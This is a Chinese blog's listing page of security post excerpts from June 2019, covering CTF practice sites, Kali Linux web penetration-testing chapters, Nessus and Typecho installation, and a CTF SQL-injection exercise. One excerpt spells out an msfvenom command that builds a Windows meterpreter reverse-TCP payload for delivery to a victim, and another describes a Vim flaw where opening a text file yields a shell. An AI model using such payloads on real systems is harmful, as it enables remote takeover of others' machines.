2019年6月22日
博客园主题美化只需要这几步
摘要: 博客园美化主题需要这几步 本人现用的这套博皮是根据bndong的博客进行修改的,且配置需要时间,有兴趣可以直接访问bndong博客,查看置顶博文进行配置。所有的修改都在博客园后台管理 >设置中,其中js的权限是要申请的。 配置期间如有不懂之处,欢迎随时评论! 我的博客皮肤 【美化方法】 安装配置 本 阅读全文
posted @ 2019-06-22 14:07 xyongsec 阅读(481) 评论(0) 推荐(0) 编辑
Kali-利用metasploit中的exploit/multi/handler进行攻击
摘要: 在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台将软件发给客户机上运行,此时ka 阅读全文
posted @ 2019-06-22 13:41 xyongsec 阅读(2866) 评论(0) 推荐(0) 编辑
CTF干货合集
摘要: CTF练习平台 http://hackinglab.cn/ 网络信息安全攻防学习平台 http://captf.com/ ctf题目 http://oj.xctf.org.cn/ XCTF_OJ练习平台 http://ctf.3sec.cn/ Jlu.CTF http://www.baimaoxue 阅读全文
posted @ 2019-06-22 13:40 xyongsec 阅读(1119) 评论(0) 推荐(0) 编辑
CTF练习资源大全集
摘要: 练习CTF清单/永久CTF清单 以下列出了一些长期运行的CTF实践站点和工具或CTF。谢谢,RSnake用于启动这是基于的原始版本。如果您有任何更正或建议,请随时通过dot com tld在域psifertex上发送电子邮件至ctf。 在线直播游戏推荐 无论是更新,包含高质量的挑战,还是只是有很多深 阅读全文
posted @ 2019-06-22 13:39 xyongsec 阅读(4092) 评论(0) 推荐(0) 编辑
丢给你一个txt并同时获取你shell
摘要: 丢给你一个txt并同时获取你shell 0x00:回顾 《文本编辑器Vim/Neovim被曝任意代码执行漏洞》 听闻很多人知道这个漏洞,但是有一部分人能复现成功,一部分人复现不出来。这里我就我自己的复现经历给大家演示一下。 git clone https://github.com/numirias/ 阅读全文
posted @ 2019-06-22 13:15 xyongsec 阅读(535) 评论(0) 推荐(0) 编辑
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装
摘要: Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web 阅读全文
posted @ 2019-06-22 13:09 xyongsec 阅读(3261) 评论(0) 推荐(0) 编辑
Kali Linux Web渗透测试手册(第二版) - 1.0 - 渗透测试环境搭建
摘要: 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web浏览器 创建一个属于自己的靶机 为正确的通信配置虚拟机 了解易受攻击的虚拟机上的 阅读全文
posted @ 2019-06-22 12:50 xyongsec 阅读(2906) 评论(2) 推荐(0) 编辑
火眼推出Windows免费渗透测试套件,包含140多款工具
摘要: 火眼推出Windows免费渗透测试套件,包含140多款工具 火眼推出Windows免费渗透测试套件,包含140多款工具 火眼推出Windows免费渗透测试套件,包含140多款工具 2019年3月28日,火眼发布了一个包含超过140个开源Windows渗透工具包,红队渗透测试员和蓝队防御人员均拥有了顶 阅读全文
posted @ 2019-06-22 11:07 xyongsec 阅读(1726) 评论(0) 推荐(0) 编辑
Centos7安装Typecho详细教程
摘要: Centos7安装Typecho详细教程 首先搭建LAMPH环境 L linux 服务器(centos或者ubunt) 、A Apache 、M mysql 、P PHP 安装Apache、PHP、Mysql、连接Mysql数据库的包: yum -y install httpd php-mysql 阅读全文
posted @ 2019-06-22 10:45 xyongsec 阅读(6725) 评论(0) 推荐(1) 编辑
Liunx 安装 Nessus
摘要: Liunx 安装 Nessus 啥子是Nessus 它是一款系统漏洞扫描与分析软件,可以扫描服务器存在哪些漏洞,页面简介美观,非常Nice。 获取激活码 首先访问如下网站 https://www.tenable.com/products/nessus/activation-code 点Registe 阅读全文
posted @ 2019-06-22 10:39 xyongsec 阅读(436) 评论(0) 推荐(0) 编辑
攻防世界 web进阶练习 NewsCenter
摘要: 攻防世界 web进阶练习 NewsCenter 题目是NewsCenter,没有提示信息。打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入。随便输入234234234,用burp抓包,发现是post方式,直接用sqlm 阅读全文
posted @ 2019-06-22 10:36 xyongsec 阅读(2664) 评论(0) 推荐(0) 编辑
针对Linux 文件完整性监控的实现
摘要: 针对Linux 文件完整性监控的实现 摘要 计算机和互联网是20世纪以来最伟大的发明之一,随着计算机技术的不断发展,人们的生活方式发生了巨大的变化。计算机和互联网的发展给人们的生产生活带来了极大的便利,但同时也存在一定的安全隐患。在人们借助互联网展开一系列活动的时候,个人信息和交易信息就会在网络中储 阅读全文
posted @ 2019-06-22 10:34 xyongsec 阅读(2847) 评论(0) 推荐(0) 编辑
ParrotSec 中文社区 QQ群认证 Openssl解密
摘要: ParrotSec 中文社区 QQ群认证 Openssl解密 ParrotSec 中文社区 QQ群认证 Openssl解密 ParrotSec 中文社区 QQ群认证 Openssl解密 ParrotSec 中文社区 QQ群认证 Openssl解密 下载Key.txt 打开parrot 系统,复制文件 阅读全文
posted @ 2019-06-22 10:32 xyongsec 阅读(519) 评论(0) 推荐(0) 编辑